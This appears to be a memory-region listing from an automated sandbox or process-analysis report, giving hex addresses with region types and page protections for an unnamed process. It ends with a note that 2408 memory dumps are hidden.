unclassified section
page readonly
34A1000
heap
page read and write
33B4000
heap
page read and write
F3C000
stack
page read and write
34A1000
heap
page read and write
33B4000
heap
page read and write
2EA0000
trusted library allocation
page read and write
2AC0000
trusted library allocation
page read and write
E50000
heap
page read and write
3145000
heap
page read and write
3144000
heap
page read and write
33B4000
heap
page read and write
2F54000
heap
page read and write
34C0000
heap
page read and write
2AC0000
trusted library allocation
page read and write
2AC0000
trusted library allocation
page read and write
5579000
heap
page read and write
2F54000
heap
page read and write
A855000
heap
page read and write
2F54000
heap
page read and write
33B4000
heap
page read and write
2EA0000
trusted library allocation
page read and write
3428000
heap
page read and write
34A1000
heap
page read and write
2EA0000
trusted library allocation
page read and write
3144000
heap
page read and write
34A1000
heap
page read and write
33B4000
heap
page read and write
340D000
heap
page read and write
33B4000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
2EA0000
trusted library allocation
page read and write
34A1000
heap
page read and write
29D0000
heap
page read and write
790000
heap
page read and write
8351000
heap
page read and write
2F54000
heap
page read and write
6EEE000
stack
page read and write
F8F000
stack
page read and write
34A1000
heap
page read and write
3144000
heap
page read and write
34A1000
heap
page read and write
2EA0000
trusted library allocation
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
2AC0000
trusted library allocation
page read and write
56F0000
heap
page read and write
3144000
heap
page read and write
323C000
stack
page read and write
34A1000
heap
page read and write
2EF0000
unclassified section
page readonly
34A1000
heap
page read and write
DD0000
heap
page read and write
33B4000
heap
page read and write
3144000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
33B4000
heap
page read and write
E58000
heap
page read and write
2AC0000
trusted library allocation
page read and write
2F54000
heap
page read and write
960000
unkown
page readonly
2F54000
heap
page read and write
980000
heap
page read and write
2F54000
heap
page read and write
3144000
heap
page read and write
F70000
heap
page read and write
34A1000
heap
page read and write
3240000
unclassified section
page readonly
33B4000
heap
page read and write
33E0000
trusted library allocation
page read and write
2EA0000
trusted library allocation
page read and write
2F54000
heap
page read and write
5429000
heap
page read and write
2F40000
unclassified section
page readonly
580000
unkown
page readonly
2EA0000
trusted library allocation
page read and write
33B4000
heap
page read and write
2D0E000
stack
page read and write
2F54000
heap
page read and write
A89E000
heap
page read and write
33B4000
heap
page read and write
9E1000
unkown
page execute read
34A1000
heap
page read and write
3145000
heap
page read and write
33B5000
heap
page read and write
34A1000
heap
page read and write
8390000
trusted library allocation
page read and write
34A1000
heap
page read and write
318E000
stack
page read and write
2F55000
heap
page read and write
3144000
heap
page read and write
33B4000
heap
page read and write
835F000
heap
page read and write
3144000
heap
page read and write
34A1000
heap
page read and write
2EA0000
trusted library allocation
page read and write
33E0000
trusted library allocation
page read and write
82B4000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
2EA0000
trusted library allocation
page read and write
2EA0000
trusted library allocation
page read and write
34A1000
heap
page read and write
7FA000
heap
page read and write
34A1000
heap
page read and write
3B56000
heap
page read and write
33B4000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
3144000
heap
page read and write
34A1000
heap
page read and write
6D0000
heap
page read and write
2F54000
heap
page read and write
3412000
heap
page read and write
34A1000
heap
page read and write
A800000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
3144000
heap
page read and write
33B4000
heap
page read and write
2360000
unclassified section
page readonly
2F54000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
33B4000
heap
page read and write
2F54000
heap
page read and write
3144000
heap
page read and write
33E0000
trusted library allocation
page read and write
3210000
unclassified section
page readonly
341B000
heap
page read and write
6D5000
unkown
page readonly
8386000
heap
page read and write
34A1000
heap
page read and write
9A4000
heap
page read and write
8310000
heap
page read and write
8337000
heap
page read and write
D60000
unkown
page readonly
34A1000
heap
page read and write
34A1000
heap
page read and write
1C0000
unclassified section
page readonly
33E0000
trusted library allocation
page read and write
34A1000
heap
page read and write
33E2000
heap
page read and write
34A1000
heap
page read and write
2EA0000
trusted library allocation
page read and write
3144000
heap
page read and write
8364000
heap
page read and write
37B0000
heap
page read and write
2AC0000
trusted library allocation
page read and write
2AC0000
trusted library allocation
page read and write
2F54000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
2F40000
heap
page read and write
9BF000
unkown
page write copy
3429000
heap
page read and write
F00000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
2F54000
heap
page read and write
3144000
heap
page read and write
2D98000
stack
page read and write
33E0000
trusted library allocation
page read and write
250000
unclassified section
page readonly
9A9000
unkown
page readonly
3144000
heap
page read and write
33B4000
heap
page read and write
2F54000
heap
page read and write
34A1000
heap
page read and write
2F54000
heap
page read and write
2DA0000
heap
page read and write
3429000
heap
page read and write
33E2000
heap
page read and write
3CA9000
heap
page read and write
34A1000
heap
page read and write
2390000
heap
page read and write
2AC0000
trusted library allocation
page read and write
34A1000
heap
page read and write
9BF000
unkown
page read and write
2870000
heap
page read and write
56F8000
heap
page read and write
34A1000
heap
page read and write
5450000
heap
page read and write
27F0000
heap
page read and write
33B4000
heap
page read and write
235C000
stack
page read and write
34A1000
heap
page read and write
11C1000
heap
page read and write
38CF000
stack
page read and write
3A4F000
heap
page read and write
2F54000
heap
page read and write
D6B000
unkown
page readonly
32DF000
heap
page read and write
34A1000
heap
page read and write
3330000
heap
page read and write
340D000
heap
page read and write
2F54000
heap
page read and write
2AC0000
trusted library allocation
page read and write
343E000
heap
page read and write
32A3000
heap
page read and write
34A1000
heap
page read and write
831F000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
5554000
heap
page read and write
34A1000
heap
page read and write
1150000
heap
page read and write
34A1000
heap
page read and write
3144000
heap
page read and write
33B4000
heap
page read and write
3470000
trusted library allocation
page read and write
556C000
heap
page read and write
829B000
heap
page read and write
3144000
heap
page read and write
910000
heap
page read and write
3144000
heap
page read and write
B2CD000
direct allocation
page read and write
8351000
heap
page read and write
2F54000
heap
page read and write
35D0000
trusted library allocation
page read and write
34A1000
heap
page read and write
3144000
heap
page read and write
34A1000
heap
page read and write
3144000
heap
page read and write
3144000
heap
page read and write
E1E000
stack
page read and write
34A1000
heap
page read and write
5564000
heap
page read and write
33E0000
trusted library allocation
page read and write
37B7000
heap
page read and write
33B4000
heap
page read and write
2A40000
unclassified section
page readonly
2F54000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
3460000
heap
page read and write
55FF000
stack
page read and write
33B4000
heap
page read and write
33B4000
heap
page read and write
2F54000
heap
page read and write
56F4000
heap
page read and write
2F54000
heap
page read and write
33B4000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
2EA0000
trusted library allocation
page read and write
34A1000
heap
page read and write
32FF000
heap
page read and write
2F54000
heap
page read and write
D6B000
unkown
page readonly
320F000
stack
page read and write
34A1000
heap
page read and write
8351000
heap
page read and write
3144000
heap
page read and write
334F000
stack
page read and write
2F54000
heap
page read and write
2F54000
heap
page read and write
3A51000
heap
page read and write
34A1000
heap
page read and write
A5A0000
remote allocation
page read and write
2AC0000
trusted library allocation
page read and write
3144000
heap
page read and write
3144000
heap
page read and write
6DD000
unkown
page readonly
2AC0000
trusted library allocation
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
3144000
heap
page read and write
2F54000
heap
page read and write
29F0000
unclassified section
page readonly
34A1000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
3410000
heap
page read and write
950000
unclassified section
page readonly
2AC0000
trusted library allocation
page read and write
2AC0000
trusted library allocation
page read and write
10D0000
heap
page read and write
3144000
heap
page read and write
3651000
heap
page read and write
2F54000
heap
page read and write
2F54000
heap
page read and write
3651000
heap
page read and write
33B4000
heap
page read and write
33B4000
heap
page read and write
34A1000
heap
page read and write
3CA0000
heap
page read and write
2F54000
heap
page read and write
5579000
heap
page read and write
33E0000
trusted library allocation
page read and write
33B4000
heap
page read and write
82A4000
heap
page read and write
34A1000
heap
page read and write
271F000
stack
page read and write
33B4000
heap
page read and write
3144000
heap
page read and write
F70000
unclassified section
page readonly
915000
heap
page read and write
33EA000
heap
page read and write
3144000
heap
page read and write
2890000
unclassified section
page readonly
580000
unkown
page readonly
2F54000
heap
page read and write
2F7C000
stack
page read and write
34A1000
heap
page read and write
2FF0000
heap
page read and write
33B4000
heap
page read and write
3144000
heap
page read and write
34A1000
heap
page read and write
E00000
heap
page read and write
3278000
stack
page read and write
2F54000
heap
page read and write
33B4000
heap
page read and write
2F55000
heap
page read and write
3441000
heap
page read and write
2F54000
heap
page read and write
2AC0000
trusted library allocation
page read and write
34A1000
heap
page read and write
38C0000
heap
page read and write
373C000
stack
page read and write
34A1000
heap
page read and write
3144000
heap
page read and write
34A1000
heap
page read and write
A8AA000
heap
page read and write
34A1000
heap
page read and write
CFC000
stack
page read and write
2AC0000
trusted library allocation
page read and write
2AC0000
trusted library allocation
page read and write
82F4000
heap
page read and write
34A1000
heap
page read and write
3B0000
unclassified section
page readonly
536F000
stack
page read and write
2AC0000
trusted library allocation
page read and write
82AB000
heap
page read and write
4DD0000
unclassified section
page readonly
34A1000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
3144000
heap
page read and write
2C20000
heap
page read and write
9A4000
heap
page read and write
33E0000
trusted library allocation
page read and write
37BD000
heap
page read and write
2AC0000
trusted library allocation
page read and write
34A1000
heap
page read and write
29BC000
stack
page read and write
6CC000
unkown
page readonly
3463000
heap
page read and write
34A1000
heap
page read and write
311E000
stack
page read and write
34A1000
heap
page read and write
2EA0000
trusted library allocation
page read and write
34A1000
heap
page read and write
2F54000
heap
page read and write
33B4000
heap
page read and write
520E000
stack
page read and write
33B4000
heap
page read and write
7B0000
heap
page read and write
2F54000
heap
page read and write
33E0000
trusted library allocation
page read and write
3144000
heap
page read and write
34A1000
heap
page read and write
559A000
heap
page read and write
3610000
heap
page read and write
3144000
heap
page read and write
34A1000
heap
page read and write
5549000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
2FAD000
stack
page read and write
11D1000
heap
page read and write
2E20000
unclassified section
page readonly
8385000
heap
page read and write
7CE000
heap
page read and write
86D000
unkown
page readonly
34A1000
heap
page read and write
33E0000
trusted library allocation
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
3427000
heap
page read and write
34A1000
heap
page read and write
352F000
stack
page read and write
326E000
stack
page read and write
33B4000
heap
page read and write
3A0000
unclassified section
page readonly
34A1000
heap
page read and write
A829000
heap
page read and write
34A1000
heap
page read and write
A96A000
heap
page read and write
34A1000
heap
page read and write
960000
unkown
page readonly
33B5000
heap
page read and write
32FB000
heap
page read and write
14C000
stack
page read and write
70EE000
stack
page read and write
2EA0000
trusted library allocation
page read and write
D39000
unkown
page readonly
33B4000
heap
page read and write
A801000
heap
page read and write
37BA000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
3415000
heap
page read and write
9A4000
heap
page read and write
11C0000
trusted library allocation
page read and write
33B5000
heap
page read and write
3144000
heap
page read and write
D2E000
unkown
page read and write
3144000
heap
page read and write
99FE000
stack
page read and write
33E0000
trusted library allocation
page read and write
3144000
heap
page read and write
2EA0000
trusted library allocation
page read and write
345A000
heap
page read and write
34A1000
heap
page read and write
2AC0000
trusted library allocation
page read and write
3350000
trusted library allocation
page read and write
32DD000
stack
page read and write
34A1000
heap
page read and write
1428000
heap
page read and write
34A1000
heap
page read and write
341C000
heap
page read and write
34A1000
heap
page read and write
8323000
heap
page read and write
3302000
heap
page read and write
86D000
unkown
page readonly
26C0000
heap
page read and write
33E0000
trusted library allocation
page read and write
2F54000
heap
page read and write
3A4D000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
2EA0000
trusted library allocation
page read and write
34A1000
heap
page read and write
2F54000
heap
page read and write
E10000
trusted library allocation
page read and write
763D000
stack
page read and write
34A1000
heap
page read and write
3270000
heap
page read and write
2F54000
heap
page read and write
3393000
heap
page read and write
34A1000
heap
page read and write
3144000
heap
page read and write
2F54000
heap
page read and write
3270000
heap
page read and write
34A1000
heap
page read and write
126C000
stack
page read and write
3144000
heap
page read and write
33E0000
trusted library allocation
page read and write
34A1000
heap
page read and write
2F55000
heap
page read and write
3CA6000
heap
page read and write
A8EA000
heap
page read and write
3144000
heap
page read and write
33B4000
heap
page read and write
34A1000
heap
page read and write
2EA0000
trusted library allocation
page read and write
2F54000
heap
page read and write
34A1000
heap
page read and write
33B4000
heap
page read and write
D2B000
unkown
page write copy
8290000
heap
page read and write
3144000
heap
page read and write
9EE000
stack
page read and write
2F54000
heap
page read and write
2F54000
heap
page read and write
344E000
stack
page read and write
33B4000
heap
page read and write
33B5000
heap
page read and write
33C8000
heap
page read and write
3145000
heap
page read and write
33B4000
heap
page read and write
327F000
heap
page read and write
2AC0000
trusted library allocation
page read and write
3120000
heap
page read and write
34A1000
heap
page read and write
3B5C000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
3B53000
heap
page read and write
532E000
stack
page read and write
D2B000
unkown
page read and write
5566000
heap
page read and write
34A1000
heap
page read and write
3144000
heap
page read and write
2F54000
heap
page read and write
33DE000
stack
page read and write
32DD000
heap
page read and write
A92B000
heap
page read and write
833B000
heap
page read and write
231E000
stack
page read and write
960000
unkown
page readonly
3399000
heap
page read and write
34A1000
heap
page read and write
33E0000
trusted library allocation
page read and write
2EA0000
trusted library allocation
page read and write
2EA0000
trusted library allocation
page read and write
34A1000
heap
page read and write
961000
unkown
page execute read
3431000
heap
page read and write
8345000
heap
page read and write
34A1000
heap
page read and write
2DB0000
heap
page read and write
7B8000
heap
page read and write
950000
heap
page read and write
2F55000
heap
page read and write
34A1000
heap
page read and write
2A90000
heap
page read and write
34A1000
heap
page read and write
33E0000
trusted library allocation
page read and write
1316000
heap
page read and write
990000
heap
page read and write
557D000
heap
page read and write
34A1000
heap
page read and write
38E9000
heap
page read and write
34A1000
heap
page read and write
374E000
stack
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
33B4000
heap
page read and write
82A4000
heap
page read and write
52AE000
stack
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
33B4000
heap
page read and write
3144000
heap
page read and write
23E0000
heap
page read and write
33E0000
trusted library allocation
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
2EA0000
trusted library allocation
page read and write
33E0000
trusted library allocation
page read and write
33B4000
heap
page read and write
2EA0000
trusted library allocation
page read and write
33FE000
heap
page read and write
2F50000
unclassified section
page readonly
3441000
heap
page read and write
34A1000
heap
page read and write
33B4000
heap
page read and write
2D2E000
stack
page read and write
327B000
heap
page read and write
34A1000
heap
page read and write
2FA0000
unclassified section
page readonly
34A1000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
54EB000
heap
page read and write
34A1000
heap
page read and write
3CAD000
heap
page read and write
5420000
heap
page read and write
DA0000
unclassified section
page readonly
110A000
heap
page read and write
12DE000
stack
page read and write
82A1000
heap
page read and write
555C000
heap
page read and write
961000
unkown
page execute read
3428000
heap
page read and write
B2F5000
direct allocation
page read and write
33B4000
heap
page read and write
34A1000
heap
page read and write
9A9000
unkown
page readonly
32B2000
heap
page read and write
29C0000
heap
page read and write
33B4000
heap
page read and write
2EA0000
trusted library allocation
page read and write
34A1000
heap
page read and write
330E000
stack
page read and write
34A1000
heap
page read and write
341B000
heap
page read and write
3470000
trusted library allocation
page read and write
3144000
heap
page read and write
34A1000
heap
page read and write
33B4000
heap
page read and write
34A1000
heap
page read and write
D1F000
stack
page read and write
82B6000
heap
page read and write
3144000
heap
page read and write
34A1000
heap
page read and write
33B4000
heap
page read and write
2AC0000
trusted library allocation
page read and write
549F000
stack
page read and write
9D8E000
stack
page read and write
3144000
heap
page read and write
34A1000
heap
page read and write
2F55000
heap
page read and write
552D000
heap
page read and write
2AC0000
trusted library allocation
page read and write
5585000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
33B4000
heap
page read and write
34A1000
heap
page read and write
33E0000
trusted library allocation
page read and write
2F54000
heap
page read and write
34A1000
heap
page read and write
9B3E000
stack
page read and write
835D000
heap
page read and write
33B4000
heap
page read and write
33EF000
stack
page read and write
387F000
stack
page read and write
34A1000
heap
page read and write
9A9000
unkown
page readonly
3145000
heap
page read and write
3145000
heap
page read and write
2F54000
heap
page read and write
2AC0000
trusted library allocation
page read and write
34A1000
heap
page read and write
2CC0000
heap
page read and write
2CAF000
stack
page read and write
3144000
heap
page read and write
581000
unkown
page execute read
2F54000
heap
page read and write
C0000
unclassified section
page readonly
3144000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
3144000
heap
page read and write
A89F000
heap
page read and write
33EB000
heap
page read and write
34A1000
heap
page read and write
33B4000
heap
page read and write
34A1000
heap
page read and write
3410000
heap
page read and write
34A1000
heap
page read and write
A92A000
heap
page read and write
3144000
heap
page read and write
34A1000
heap
page read and write
9A4000
heap
page read and write
2AC0000
trusted library allocation
page read and write
34A1000
heap
page read and write
A5A0000
remote allocation
page read and write
2F54000
heap
page read and write
C77000
unkown
page readonly
2AC0000
trusted library allocation
page read and write
34A1000
heap
page read and write
33B4000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
2F54000
heap
page read and write
33B4000
heap
page read and write
343C000
heap
page read and write
A895000
heap
page read and write
34A1000
heap
page read and write
56B0000
heap
page read and write
34A1000
heap
page read and write
32FF000
heap
page read and write
961000
unkown
page execute read
34A1000
heap
page read and write
2DEF000
stack
page read and write
34A1000
heap
page read and write
33E0000
trusted library allocation
page read and write
53BE000
stack
page read and write
2EA0000
trusted library allocation
page read and write
3144000
heap
page read and write
2F54000
heap
page read and write
33B4000
heap
page read and write
E10000
heap
page read and write
3302000
heap
page read and write
10E8000
heap
page read and write
3B0000
unclassified section
page readonly
34A1000
heap
page read and write
10BF000
stack
page read and write
3620000
heap
page read and write
34A1000
heap
page read and write
2F54000
heap
page read and write
34A1000
heap
page read and write
E4E000
stack
page read and write
2F54000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
2AC0000
trusted library allocation
page read and write
2F54000
heap
page read and write
390E000
stack
page read and write
3144000
heap
page read and write
34A1000
heap
page read and write
3418000
heap
page read and write
2AC0000
trusted library allocation
page read and write
35FF000
stack
page read and write
33B4000
heap
page read and write
5575000
heap
page read and write
8EE000
stack
page read and write
8326000
heap
page read and write
2AC0000
trusted library allocation
page read and write
3145000
heap
page read and write
9C3000
unkown
page readonly
34A1000
heap
page read and write
34A1000
heap
page read and write
260000
unclassified section
page readonly
34A1000
heap
page read and write
82B4000
heap
page read and write
33B4000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
33B4000
heap
page read and write
34A1000
heap
page read and write
3459000
heap
page read and write
3348000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
5422000
heap
page read and write
550C000
heap
page read and write
6A0000
unclassified section
page readonly
832F000
heap
page read and write
34A1000
heap
page read and write
BC0000
unclassified section
page readonly
6DD000
unkown
page readonly
34A1000
heap
page read and write
8358000
heap
page read and write
2F54000
heap
page read and write
E6B000
stack
page read and write
363F000
stack
page read and write
34A1000
heap
page read and write
824E000
stack
page read and write
34A1000
heap
page read and write
33B4000
heap
page read and write
890000
unclassified section
page readonly
34A1000
heap
page read and write
3144000
heap
page read and write
33B4000
heap
page read and write
3144000
heap
page read and write
2F54000
heap
page read and write
34A1000
heap
page read and write
33B4000
heap
page read and write
2AC0000
trusted library allocation
page read and write
960000
unkown
page readonly
34A1000
heap
page read and write
13D0000
heap
page read and write
33E0000
trusted library allocation
page read and write
33E0000
trusted library allocation
page read and write
515A000
stack
page read and write
2F54000
heap
page read and write
34A1000
heap
page read and write
3144000
heap
page read and write
8332000
heap
page read and write
34A1000
heap
page read and write
2EAE000
stack
page read and write
559A000
heap
page read and write
2EA0000
trusted library allocation
page read and write
3288000
heap
page read and write
3302000
heap
page read and write
33B4000
heap
page read and write
33B4000
heap
page read and write
3144000
heap
page read and write
A802000
heap
page read and write
34A1000
heap
page read and write
B3A2000
direct allocation
page read and write
34A1000
heap
page read and write
3144000
heap
page read and write
34A1000
heap
page read and write
2EE8000
stack
page read and write
34A1000
heap
page read and write
A801000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
33B4000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
2F54000
heap
page read and write
2F54000
heap
page read and write
33B4000
heap
page read and write
FF5000
heap
page read and write
235F000
stack
page read and write
12C0000
trusted library allocation
page read and write
5429000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
52EF000
stack
page read and write
34A1000
heap
page read and write
2F54000
heap
page read and write
34A1000
heap
page read and write
F60000
heap
page read and write
2CE0000
unclassified section
page readonly
33B4000
heap
page read and write
2BAE000
stack
page read and write
33E0000
trusted library allocation
page read and write
33E0000
trusted library allocation
page read and write
33B4000
heap
page read and write
34A1000
heap
page read and write
7DA000
heap
page read and write
34A1000
heap
page read and write
33B4000
heap
page read and write
32B7000
heap
page read and write
34A1000
heap
page read and write
A896000
heap
page read and write
34A1000
heap
page read and write
2FCC000
stack
page read and write
9A4000
heap
page read and write
34C8000
heap
page read and write
2BFE000
stack
page read and write
B080000
direct allocation
page read and write
6F00000
heap
page read and write
34A1000
heap
page read and write
33B4000
heap
page read and write
3427000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
279F000
stack
page read and write
3A44000
heap
page read and write
2AC0000
trusted library allocation
page read and write
2AC0000
trusted library allocation
page read and write
34A1000
heap
page read and write
2F54000
heap
page read and write
530D000
stack
page read and write
961000
unkown
page execute read
33B4000
heap
page read and write
DBE000
stack
page read and write
2F55000
heap
page read and write
814E000
stack
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
33C8000
heap
page read and write
33AE000
stack
page read and write
32F0000
unclassified section
page readonly
33B4000
heap
page read and write
2F55000
heap
page read and write
34A1000
heap
page read and write
33B5000
heap
page read and write
3144000
heap
page read and write
34A1000
heap
page read and write
3144000
heap
page read and write
3436000
heap
page read and write
2F54000
heap
page read and write
34A1000
heap
page read and write
2F54000
heap
page read and write
2EA0000
trusted library allocation
page read and write
34A1000
heap
page read and write
2EA0000
trusted library allocation
page read and write
33E0000
trusted library allocation
page read and write
C60000
heap
page read and write
34A1000
heap
page read and write
A8A4000
heap
page read and write
2F54000
heap
page read and write
34A1000
heap
page read and write
A6FE000
stack
page read and write
34A1000
heap
page read and write
9BF000
unkown
page write copy
E08000
heap
page read and write
2F54000
heap
page read and write
D6D000
stack
page read and write
3000000
heap
page read and write
2F54000
heap
page read and write
2EA0000
trusted library allocation
page read and write
33E0000
trusted library allocation
page read and write
2AC0000
trusted library allocation
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
2BCE000
stack
page read and write
2AC0000
trusted library allocation
page read and write
3145000
heap
page read and write
375F000
stack
page read and write
3144000
heap
page read and write
35D0000
trusted library allocation
page read and write
2F54000
heap
page read and write
34DF000
stack
page read and write
B2D6000
direct allocation
page read and write
33C0000
heap
page read and write
34FE000
stack
page read and write
33B4000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
3145000
heap
page read and write
33E0000
trusted library allocation
page read and write
3144000
heap
page read and write
33B4000
heap
page read and write
2F54000
heap
page read and write
32B0000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
C77000
unkown
page readonly
3431000
heap
page read and write
365E000
stack
page read and write
33B4000
heap
page read and write
2AC0000
trusted library allocation
page read and write
2F54000
heap
page read and write
6F84000
heap
page read and write
2EA0000
trusted library allocation
page read and write
73E000
unkown
page read and write
2EA0000
trusted library allocation
page read and write
2EA0000
trusted library allocation
page read and write
2F54000
heap
page read and write
2F54000
heap
page read and write
9BF000
unkown
page read and write
34A1000
heap
page read and write
829E000
heap
page read and write
11C1000
heap
page read and write
2F50000
heap
page read and write
33B4000
heap
page read and write
34A1000
heap
page read and write
7830000
heap
page read and write
3145000
heap
page read and write
2AC0000
trusted library allocation
page read and write
2AC0000
trusted library allocation
page read and write
2F54000
heap
page read and write
9A4000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
880000
unclassified section
page readonly
2AC0000
trusted library allocation
page read and write
328D000
heap
page read and write
2F54000
heap
page read and write
38EA000
heap
page read and write
78C0000
trusted library allocation
page read and write
537F000
stack
page read and write
505A000
stack
page read and write
33B5000
heap
page read and write
37B4000
heap
page read and write
37BF000
heap
page read and write
2F54000
heap
page read and write
9A4000
heap
page read and write
34A1000
heap
page read and write
3144000
heap
page read and write
2F54000
heap
page read and write
829F000
heap
page read and write
33E0000
trusted library allocation
page read and write
3CB2000
heap
page read and write
2F54000
heap
page read and write
2EA0000
trusted library allocation
page read and write
9ED000
stack
page read and write
2CB0000
heap
page read and write
323C000
heap
page read and write
34A1000
heap
page read and write
37BD000
heap
page read and write
31FE000
stack
page read and write
3144000
heap
page read and write
34A1000
heap
page read and write
2D4F000
stack
page read and write
34A1000
heap
page read and write
2F54000
heap
page read and write
34BF000
stack
page read and write
34A1000
heap
page read and write
33E0000
trusted library allocation
page read and write
33B4000
heap
page read and write
5551000
heap
page read and write
34A1000
heap
page read and write
10E0000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
3520000
heap
page read and write
33B4000
heap
page read and write
33D0000
heap
page read and write
9A4000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
2F54000
heap
page read and write
345C000
heap
page read and write
33E0000
trusted library allocation
page read and write
2AC0000
trusted library allocation
page read and write
2C60000
heap
page read and write
33E0000
trusted library allocation
page read and write
3280000
heap
page read and write
2F55000
heap
page read and write
2AC0000
trusted library allocation
page read and write
3144000
heap
page read and write
3144000
heap
page read and write
2EA0000
trusted library allocation
page read and write
26D0000
heap
page read and write
3640000
heap
page read and write
3144000
heap
page read and write
34A1000
heap
page read and write
8386000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
3238000
heap
page read and write
961000
unkown
page execute read
33B4000
heap
page read and write
34A1000
heap
page read and write
3427000
heap
page read and write
33E0000
trusted library allocation
page read and write
3144000
heap
page read and write
54B4000
heap
page read and write
33E0000
trusted library allocation
page read and write
3B59000
heap
page read and write
34A1000
heap
page read and write
3144000
heap
page read and write
2FED000
stack
page read and write
2F54000
heap
page read and write
95D000
stack
page read and write
2F60000
heap
page read and write
34A1000
heap
page read and write
34A1000
heap
page read and write
3144000
heap
page read and write
33E0000
trusted library allocation
page read and write
2F54000
heap
page read and write
2F54000
heap
page read and write
There are 2408 hidden memdumps, click here to show them.